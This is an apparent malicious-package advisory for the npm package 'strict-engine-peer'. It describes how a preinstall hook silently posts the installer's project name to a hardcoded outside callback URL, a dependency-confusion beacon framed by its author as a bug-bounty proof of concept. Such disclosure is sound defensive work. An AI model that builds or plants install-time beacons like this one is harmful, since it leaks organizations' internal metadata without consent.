MAL-2026-5898

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (0913b30a168bfed09d3c5ae59aeaf6a305a395f86516fb1fb8ece60bb95904de) On `npm install`, the package's preinstall hook (`preinstall: node index.js` in package.json) executes index.js, which reads the installer's project directory via `process.env.INIT_CWD`, takes its basename as `safeProjectName`, and POSTs a JSON payload containing that name and a timestamp to a hardcoded callback URL `https://deepbounty.dd06-dev.fr/cb/d9b7e171-33a4-49c7-aa79-c95794030d3b`. The package self-describes as a 'Security PoC for Bug Bounty' / 'Harmless dependency confusion PoC', and the name `strict-engine-peer` is consistent with squatting an internal/private package name on the public npm registry. Any developer or build system that resolves this package — typically by accident, via dependency confusion against an internal package of the same name — silently discloses the existence and name of an internal project to the third-party endpoint. The 'research' framing does not change the installer-side impact: unconsented network beacon at install time, leaking organizational metadata to an attacker-controlled host.